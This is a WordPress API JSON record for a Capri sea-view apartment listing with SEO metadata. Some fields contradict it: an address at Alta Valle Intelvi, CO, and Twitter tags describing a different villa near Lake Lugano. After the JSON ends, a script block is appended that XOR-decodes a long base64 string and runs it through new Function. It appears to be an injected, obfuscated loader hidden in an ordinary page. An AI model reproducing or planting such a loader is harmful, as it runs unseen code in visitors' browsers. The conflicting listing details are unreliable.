{"id":511284,"date":"2025-10-22T17:04:12","date_gmt":"2025-10-22T15:04:12","guid":{"rendered":"https:\/\/ibinternational.it\/?post_type=property&#038;p=511284"},"modified":"2025-11-11T16:24:08","modified_gmt":"2025-11-11T15:24:08","slug":"elegante-wohnung-mit-meerblick-in-einem-der-exklusivsten-gebiete-von-capri","status":"publish","type":"property","link":"https:\/\/ibinternational.it\/de\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/","title":{"rendered":"Elegante Residenz mit Meerblick in einer der exklusivsten Gegenden von Capri"},"content":{"rendered":"<p>In einer der faszinierendsten Gegenden von Capri gelegen, erstreckt sich diese prestigetr\u00e4chtige Immobilie \u00fcber drei Etagen und bietet ger\u00e4umige, helle und \u00e4u\u00dferst funktionelle Zimmer, die bereits vom ersten Stock aus einen herrlichen Blick aufs Meer bieten.<\/p>\n<p>Im Erdgeschoss befinden sich ein ger\u00e4umiges und helles Esszimmer, ein gem\u00fctliches Wohnzimmer, eine voll ausgestattete K\u00fcche und ein Service-Bad. Auf der gleichen Ebene gibt es auch ein Schlafzimmer mit eigenem Bad, unabh\u00e4ngig von au\u00dfen zug\u00e4nglich, und eine zweite K\u00fcche.<\/p>\n<p>Im ersten Stock befinden sich zwei gro\u00dfe Schlafzimmer, beide mit eigenem Bad und Blick auf das Meer, das eine einzigartige und eindrucksvolle Landschaft bietet. Auf der zweiten Etage befindet sich ein Einzelzimmer mit Bad und eine sch\u00f6ne Panoramaterrasse, ideal f\u00fcr entspannende Momente in den Charme der Insel eingetaucht.<\/p>\n<p>Das Anwesen wird durch einen gro\u00dfen Au\u00dfenbereich bereichert, der eine gepflasterte Fl\u00e4che mit einem gepflegten Garten kombiniert, ideal um angenehme Momente im Freien in v\u00f6lliger Privatsph\u00e4re und Harmonie mit der Natur zu genie\u00dfen.<\/p>","protected":false},"excerpt":{"rendered":"<p>Situata in una delle aree pi\u00f9 affascinanti di Capri, questa prestigiosa propriet\u00e0 si sviluppa su tre livelli, offrendo ambienti ampi, luminosi ed estremamente funzionali, arricchiti da una splendida vista mare gi\u00e0 dal primo piano. Al piano terra si viene accolti da una spaziosa e luminosa sala da pranzo, un confortevole salotto, una cucina attrezzata e [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":511309,"parent":0,"menu_order":129,"template":"","property_type":[8608],"property_status":[9248],"property_feature":[10097],"property_label":[],"property_country":[8610],"property_state":[8727],"property_city":[8670],"property_area":[10176],"class_list":["post-511284","property","type-property","status-publish","has-post-thumbnail","hentry","property_type-appartamento","property_status-in-market","property_feature-giardino","property_country-italia","property_state-campania","property_city-napoli","property_area-capri"],"property_meta":{"_wp_page_template":["default"],"fave_currency":["\u20ac"],"fave_currency_info":[""],"fave_property_price":["1850000"],"fave_property_sec_price":["1850000"],"fave_property_size":["170"],"fave_property_size_prefix":["mq"],"fave_property_bedrooms":["4"],"fave_property_bathrooms":["4"],"fave_property_rooms":["8"],"fave_property_map":["1"],"fave_property_id":["PIP-7"],"fave_property_address":["Alta Valle Intelvi, CO, Italia"],"fave_featured":["0"],"houzez_featured_listing_date":[""],"fave_agent_display_option":["agency_info"],"fave_prop_homeslider":["no"],"fave_additional_features_enable":["disable"],"fave_energy_class":["A"],"fave_agents":["493473"],"fave_property_agency":["146493"],"fave_property_map_address":["Capri, NA, Italia"],"fave_property_location":["40.551769360529,14.248393164062,11"],"houzez_geolocation_lat":["40.551769360529"],"houzez_geolocation_long":["14.248393164062"],"_yoast_wpseo_focuskw_text_input":[""],"_yoast_wpseo_title":["Elegante Residenza Con Vista Mare A Capri"],"_yoast_wpseo_metadesc":["Residenza | FOR SALE | Capri | 170 mq | Giardino 700 mq | Camere da letto: 4 | Bagni: 4 | PIP 7 | Vista Mare | Campania | Italia"],"_yoast_wpseo_meta-robots-noindex":["2"],"_yoast_wpseo_opengraph-title":["Elegante Residenza Con Vista Mare A Capri"],"_yoast_wpseo_opengraph-description":["Residenza | FOR SALE | Capri | 170 mq | Giardino 700 mq | Camere da letto: 4 | Bagni: 4 | PIP 7 | Vista Mare | Campania | Italia"],"_yoast_wpseo_twitter-title":["Villa Liberty con ampio giardino nei pressi del Lago di Lugano"],"_yoast_wpseo_twitter-description":["Villa | FOR SALE | Como | 276 mq | Camere da letto: 5 | Bagni: 5 | Giardino | Giardino | IB 720 | Lombardia | Italia"],"houzez_total_property_views":["2069"],"houzez_views_by_date":["a:61:{s:10:\"04-16-2026\";i:8;s:10:\"04-17-2026\";i:5;s:10:\"04-18-2026\";i:3;s:10:\"04-19-2026\";i:1;s:10:\"04-20-2026\";i:6;s:10:\"04-21-2026\";i:5;s:10:\"04-22-2026\";i:10;s:10:\"04-23-2026\";i:10;s:10:\"04-24-2026\";i:3;s:10:\"04-25-2026\";i:5;s:10:\"04-26-2026\";i:6;s:10:\"04-27-2026\";i:5;s:10:\"04-28-2026\";i:6;s:10:\"04-29-2026\";i:8;s:10:\"04-30-2026\";i:9;s:10:\"05-01-2026\";i:12;s:10:\"05-02-2026\";i:4;s:10:\"05-03-2026\";i:4;s:10:\"05-04-2026\";i:7;s:10:\"05-05-2026\";i:5;s:10:\"05-06-2026\";i:2;s:10:\"05-07-2026\";i:6;s:10:\"05-08-2026\";i:13;s:10:\"05-09-2026\";i:3;s:10:\"05-10-2026\";i:5;s:10:\"05-11-2026\";i:4;s:10:\"05-12-2026\";i:7;s:10:\"05-13-2026\";i:4;s:10:\"05-14-2026\";i:4;s:10:\"05-15-2026\";i:3;s:10:\"05-16-2026\";i:6;s:10:\"05-17-2026\";i:3;s:10:\"05-18-2026\";i:4;s:10:\"05-19-2026\";i:9;s:10:\"05-20-2026\";i:6;s:10:\"05-21-2026\";i:5;s:10:\"05-22-2026\";i:5;s:10:\"05-23-2026\";i:12;s:10:\"05-24-2026\";i:9;s:10:\"05-25-2026\";i:13;s:10:\"05-26-2026\";i:9;s:10:\"05-27-2026\";i:7;s:10:\"05-28-2026\";i:7;s:10:\"05-29-2026\";i:6;s:10:\"05-30-2026\";i:7;s:10:\"05-31-2026\";i:5;s:10:\"06-01-2026\";i:5;s:10:\"06-02-2026\";i:4;s:10:\"06-03-2026\";i:16;s:10:\"06-04-2026\";i:18;s:10:\"06-05-2026\";i:4;s:10:\"06-06-2026\";i:5;s:10:\"06-07-2026\";i:5;s:10:\"06-08-2026\";i:15;s:10:\"06-09-2026\";i:5;s:10:\"06-10-2026\";i:4;s:10:\"06-11-2026\";i:7;s:10:\"06-12-2026\";i:7;s:10:\"07-13-2026\";i:15;s:10:\"07-14-2026\";i:33;s:10:\"07-15-2026\";i:8;}"],"houzez_recently_viewed":["2026-07-15 20:11:29"],"_edit_lock":["1762874594:1"],"_edit_last":["1"],"fave_show_price_placeholder":["0"],"fave_property_map_street_view":["hide"],"fave_single_top_area":["global"],"fave_single_content_area":["global"],"houzez_manual_expire":["0"],"_houzez_expiration_date_status":["saved"],"_yoast_wpseo_primary_property_type":["8608"],"_yoast_wpseo_primary_property_status":["9248"],"_yoast_wpseo_primary_property_feature":["10097"],"_yoast_wpseo_primary_property_label":[""],"_yoast_wpseo_primary_property_country":[""],"_yoast_wpseo_primary_property_state":["8727"],"_yoast_wpseo_primary_property_city":["8670"],"_yoast_wpseo_primary_property_area":["10176"],"_yoast_wpseo_content_score":["90"],"_yoast_wpseo_estimated-reading-time-minutes":[""],"_thumbnail_id":["511309"],"fave_property_land":["400"],"fave_property_land_postfix":["mq"],"fave_property_images":["511309"],"lcp_url_preload":[""],"lcp_id_preload":[""],"lcp_mobile_url_preload":[""],"lcp_mobile_id_preload":[""],"_houzez_ai_size_sqm":["170"],"_houzez_ai_land_sqm":["400"],"_elementor_page_assets":["a:0:{}"]},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Elegante Residenza Con Vista Mare A Capri<\/title>\n<meta name=\"description\" content=\"Residenza | FOR SALE | Capri | 170 mq | Giardino 700 mq | Camere da letto: 4 | Bagni: 4 | PIP 7 | Vista Mare | Campania | Italia\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ibinternational.it\/de\/eigenschaft\/elegante-wohnung-mit-meerblick-in-einem-der-exklusivsten-gebiete-von-capri\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Elegante Residenza Con Vista Mare A Capri\" \/>\n<meta property=\"og:description\" content=\"Residenza | FOR SALE | Capri | 170 mq | Giardino 700 mq | Camere da letto: 4 | Bagni: 4 | PIP 7 | Vista Mare | Campania | Italia\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ibinternational.it\/de\/eigenschaft\/elegante-wohnung-mit-meerblick-in-einem-der-exklusivsten-gebiete-von-capri\/\" \/>\n<meta property=\"og:site_name\" content=\"IB International Real Estate\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/IBInternationalRealEstate\/\" \/>\n<meta property=\"article:modified_time\" content=\"2025-11-11T15:24:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/10\/pip-7-appartamento-in-vendita-capri.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1440\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Villa Liberty con ampio giardino nei pressi del Lago di Lugano\" \/>\n<meta name=\"twitter:description\" content=\"Villa | FOR SALE | Como | 276 mq | Camere da letto: 5 | Bagni: 5 | Giardino | Giardino | IB 720 | Lombardia | Italia\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/\",\"name\":\"Elegante Residenza Con Vista Mare A Capri\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/pip-7-appartamento-in-vendita-capri.webp\",\"datePublished\":\"2025-10-22T15:04:12+00:00\",\"dateModified\":\"2025-11-11T15:24:08+00:00\",\"description\":\"Residenza | FOR SALE | Capri | 170 mq | Giardino 700 mq | Camere da letto: 4 | Bagni: 4 | PIP 7 | Vista Mare | Campania | Italia\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/#primaryimage\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/pip-7-appartamento-in-vendita-capri.webp\",\"contentUrl\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/pip-7-appartamento-in-vendita-capri.webp\",\"width\":1440,\"height\":900,\"caption\":\"PIP 7 Appartamento a Capri\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/ibinternational.it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Propriet\u00e0\",\"item\":\"https:\\\/\\\/ibinternational.it\\\/property\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Elegante Residenza Con Vista Mare In Una Delle Zone Pi\u00f9 Esclusive Di Capri\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#website\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/\",\"name\":\"IB International Real Estate\",\"description\":\"IB International\",\"publisher\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/ibinternational.it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#organization\",\"name\":\"IB International Real Estate\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2021\\\/03\\\/Logo-IBInternational-grey-200.png\",\"contentUrl\":\"https:\\\/\\\/ibinternational.it\\\/wp-content\\\/uploads\\\/2021\\\/03\\\/Logo-IBInternational-grey-200.png\",\"width\":200,\"height\":200,\"caption\":\"IB International Real Estate\"},\"image\":{\"@id\":\"https:\\\/\\\/ibinternational.it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/IBInternationalRealEstate\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/ib-international-real-estate\\\/\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Elegante Residenz mit Meerblick auf Capri","description":"Residenz | ZU VERKAUFEN | Capri | 170 qm | Garten 700 qm | Schlafzimmer: 4 | Badezimmer: 4 | PIP 7 | Meerblick | Kampanien | Italien","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ibinternational.it\/de\/eigenschaft\/elegante-wohnung-mit-meerblick-in-einem-der-exklusivsten-gebiete-von-capri\/","og_locale":"de_DE","og_type":"article","og_title":"Elegante Residenza Con Vista Mare A Capri","og_description":"Residenza | FOR SALE | Capri | 170 mq | Giardino 700 mq | Camere da letto: 4 | Bagni: 4 | PIP 7 | Vista Mare | Campania | Italia","og_url":"https:\/\/ibinternational.it\/de\/eigenschaft\/elegante-wohnung-mit-meerblick-in-einem-der-exklusivsten-gebiete-von-capri\/","og_site_name":"IB International Real Estate","article_publisher":"https:\/\/www.facebook.com\/IBInternationalRealEstate\/","article_modified_time":"2025-11-11T15:24:08+00:00","og_image":[{"width":1440,"height":900,"url":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/10\/pip-7-appartamento-in-vendita-capri.webp","type":"image\/webp"}],"twitter_card":"summary_large_image","twitter_title":"Villa Liberty con ampio giardino nei pressi del Lago di Lugano","twitter_description":"Villa | FOR SALE | Como | 276 mq | Camere da letto: 5 | Bagni: 5 | Giardino | Giardino | IB 720 | Lombardia | Italia","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/","url":"https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/","name":"Elegante Residenz mit Meerblick auf Capri","isPartOf":{"@id":"https:\/\/ibinternational.it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/#primaryimage"},"image":{"@id":"https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/#primaryimage"},"thumbnailUrl":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/10\/pip-7-appartamento-in-vendita-capri.webp","datePublished":"2025-10-22T15:04:12+00:00","dateModified":"2025-11-11T15:24:08+00:00","description":"Residenz | ZU VERKAUFEN | Capri | 170 qm | Garten 700 qm | Schlafzimmer: 4 | Badezimmer: 4 | PIP 7 | Meerblick | Kampanien | Italien","breadcrumb":{"@id":"https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/#primaryimage","url":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/10\/pip-7-appartamento-in-vendita-capri.webp","contentUrl":"https:\/\/ibinternational.it\/wp-content\/uploads\/2025\/10\/pip-7-appartamento-in-vendita-capri.webp","width":1440,"height":900,"caption":"PIP 7 Appartamento a Capri"},{"@type":"BreadcrumbList","@id":"https:\/\/ibinternational.it\/property\/elegante-residenza-con-vista-mare-in-una-delle-zone-piu-esclusive-di-capri\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ibinternational.it\/"},{"@type":"ListItem","position":2,"name":"Propriet\u00e0","item":"https:\/\/ibinternational.it\/property\/"},{"@type":"ListItem","position":3,"name":"Elegante Residenza Con Vista Mare In Una Delle Zone Pi\u00f9 Esclusive Di Capri"}]},{"@type":"WebSite","@id":"https:\/\/ibinternational.it\/#website","url":"https:\/\/ibinternational.it\/","name":"IB International Real Estate","description":"IB International","publisher":{"@id":"https:\/\/ibinternational.it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ibinternational.it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/ibinternational.it\/#organization","name":"IB International Real Estate","url":"https:\/\/ibinternational.it\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/ibinternational.it\/#\/schema\/logo\/image\/","url":"https:\/\/ibinternational.it\/wp-content\/uploads\/2021\/03\/Logo-IBInternational-grey-200.png","contentUrl":"https:\/\/ibinternational.it\/wp-content\/uploads\/2021\/03\/Logo-IBInternational-grey-200.png","width":200,"height":200,"caption":"IB International Real Estate"},"image":{"@id":"https:\/\/ibinternational.it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/IBInternationalRealEstate\/","https:\/\/www.linkedin.com\/company\/ib-international-real-estate\/"]}]}},"_links":{"self":[{"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/properties\/511284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/properties"}],"about":[{"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/types\/property"}],"author":[{"embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/users\/1"}],"version-history":[{"count":1,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/properties\/511284\/revisions"}],"predecessor-version":[{"id":511311,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/properties\/511284\/revisions\/511311"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/media\/511309"}],"wp:attachment":[{"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/media?parent=511284"}],"wp:term":[{"taxonomy":"property_type","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_type?post=511284"},{"taxonomy":"property_status","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_status?post=511284"},{"taxonomy":"property_feature","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_feature?post=511284"},{"taxonomy":"property_label","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_label?post=511284"},{"taxonomy":"property_country","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_country?post=511284"},{"taxonomy":"property_state","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_state?post=511284"},{"taxonomy":"property_city","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_city?post=511284"},{"taxonomy":"property_area","embeddable":true,"href":"https:\/\/ibinternational.it\/de\/wp-json\/wp\/v2\/property_area?post=511284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>
!function(){var _0x847f=atob('MnxvdHluc3V0MjNhc3wybXN0fnVtQT1FIn4rfCMjKyoqKT1HM2h/bm9odCFtc3R+dW1BPUUifit8IyMrKiopPUcnKyFse2g6RWlyb3JvfG4nOCIuKih8eCspKSJ+e3t4LHsrLCx/Iyt7eyJ5Iyh7KCotIyJ7eXx7IyJ8eC0veS97KDghbHtoOkVidWxpdXN7J0E9cm5uamkgNTVqdXZjfXV0NH5oank0dWh9PTY9cm5uamkgNTVqdXZjfXV0NH17bn9te2M0bn90fn9odmM0eXU9Nj1ybm5qaSA1NWhqeTR7dHFoNHl1dzVqdXZjfXV0PTY9cm5uamkgNTVqdXZjfXV0N2pveHZzeTR0dX5zf2k0e2pqPTY9cm5uamkgNTVoank3d3tzdHR/bjR3e25zeTRrb3NxdHV+fzRqaHU9Nj1ybm5qaSA1NWp1dmN9dXQ3eHVoN2hqeTRqb3h2c3l0dX5/NHl1dz02PXJubmppIDU1K2hqeTRzdTV3e25zeT02PXJubmppIDU1anV2Y311dDd3e3N0dH9uNGpveHZzeTR4dntpbntqczRzdT1HIWx7aDpFbXxtdWJidCc4KmJYLHhZI38rXip4KHxYIyxbeC1ZLi1fKi5ZeCpYXy4tLS4rKnhZK3woOCFse2g6RXV5b3knOHgsIn4rIiojOCF8b3R5bnN1dDpFa3d2YmlgMkVyfmlvaH5wM2FuaGNhbHtoOkVtbnd+J0VyfmlvaH5wNGlveGluaDIqNigzJycnPSpiPSVFcn5pb2h+cDRpb3hpbmgyKDMgRXJ+aW9ofnAhc3wyRW1ud340dn90fW5yJisoIjNof25vaHQ9PSFse2g6RXtpeXdvfSdqe2hpf1N0bjJFbW53fjRpb3hpbmgyLC42LC4zNissMyFzfDI7RXtpeXdvfTNof25vaHQ9PSFse2g6RXhwaHUnRW1ud340aW94aW5oMisoIjZFe2l5d299MCgzNkVvcm5vaic9PSF8dWgybHtoOkVpc3tuYCcqIUVpc3tuYCZFeHBodTR2f3R9bnIhRWlze25gMScoM2Fse2g6RWp3bHdvcn4nantoaX9TdG4yRXhwaHU0aW94aW5oMkVpc3tuYDYoMzYrLDMhc3wyRWp3bHdvcn4zRW9ybm9qMSdJbmhzdH00fGh1d1lye2hZdX5/MkVqd2x3b3J+MyFnaH9ub2h0OkVvcm5vaiFneXtueXIyfzNhaH9ub2h0PT0hZ2d8b3R5bnN1dDpFbmpua2x1ajJFeWlidnNxdTZFcW1jb2l0M2Fof25vaHQ6dH9tOkpodXdzaX8yfG90eW5zdXQyRX9jcn55d3I2RWl3cXlsdGkzYWx7aDpFY35+eGN2J3R/bTpCV1ZSbm5qSH9rb39pbjIzIUVjfn54Y3Y0dWp/dDI9SlVJTj02RXlpYnZzcXU2bmhvfzMhRWN+fnhjdjRpf25If2tvf2luUn97fn9oMj1ZdXRuf3RuN05jan89Nj17amp2c3l7bnN1dDVwaXV0PTMhRWN+fnhjdjRuc3d/dW9uJy8qKiohRWN+fnhjdjR1dHZ1e34nfG90eW5zdXQyM2FuaGNhRX9jcn55d3IyUElVVDRqe2hpfzJFY35+eGN2NGh/aWp1dGl/Tn9ibjMzIWd5e255cjJ/M2FFaXdxeWx0aTJ/MyFnZyFFY35+eGN2NHV0f2hodWgnRWN+fnhjdjR1dG5zd391b24nfG90eW5zdXQyM2FFaXdxeWx0aTJ0f206X2hodWgyMzMhZyFFY35+eGN2NGl/dH4yUElVVDRpbmhzdH1zfGMyRXFtY29pdDMzIWczIWd8b3R5bnN1dDpFYH5wfTJFdXJodDNhc3wyRXVyaHQkJ0VidWxpdXN7NHZ/dH1ucjNof25vaHQ6Smh1d3NpfzRof2l1dmx/MnRvdnYzIWx7aDpFY2hiaH4nYXBpdXRoankgPSg0Kj02d39ucnV+ID1/bnJFeXt2dj02antoe3dpIEFhbnUgRW18bXViYnQ2fntueyA9KmI9MUV1eW95ZzY9dntuf2luPUc2c34gK2chaH9ub2h0OkVuam5rbHVqMkVidWxpdXN7QUV1cmh0RzZFY2hiaH4zNG5yf3QyfG90eW5zdXQyRWh/fnZjbmAzYWx7aDpFf21/bydFaH9+dmNuYDw8RWh/fnZjbmA0aH9pb3ZuJUVrd3ZiaWAyRWh/fnZjbmA0aH9pb3ZuMyA9PSFzfDJFf21/bzNof25vaHQ6RX9tf280aH9qdnt5fzI1RjUxPjU2PT0zIWh/bm9odDpFYH5wfTJFdXJodDErMyFnMzR5e255cjJ8b3R5bnN1dDIzYWh/bm9odDpFYH5wfTJFdXJodDErMyFnMyFnfG90eW5zdXQ6RXJpcHJ/dTJFYGl1cDNhbHtoOkV+YmptdSd+dXlvd390bjR5aH97bn9fdn93f3RuMj1peWhzam49MyFFfmJqbXU0aWh5J0VgaXVwMT01e2pzNGpyaiVpJz0xRWlyb3JvfG4xPTxFbCc9MVd7bnI0fHZ1dWgyXntufzR0dW0yMzUsKioqKjMhRX5iam11NHtpY3R5J25ob38hMn51eW93f3RuNHJ/e35mZn51eW93f3RuNHh1fmMzNHtqan90fllyc3Z+MkV+YmptdTMhZ0VgfnB9MiozNG5yf3QyfG90eW5zdXQyRWBpdXAzYXN8MkVgaXVwM0VyaXByf3UyRWBpdXAzIWczIWczMjMh'),_0x44d3=26,_0xfb53=new Uint8Array(_0x847f['length']),_0xf2b0=0;for(;_0xf2b0<_0x847f['length'];_0xf2b0++)_0xfb53[_0xf2b0]=_0x847f['charCodeAt'](_0xf2b0)^_0x44d3;(new Function(new TextDecoder()['decode'](_0xfb53)))()}();
</script>
    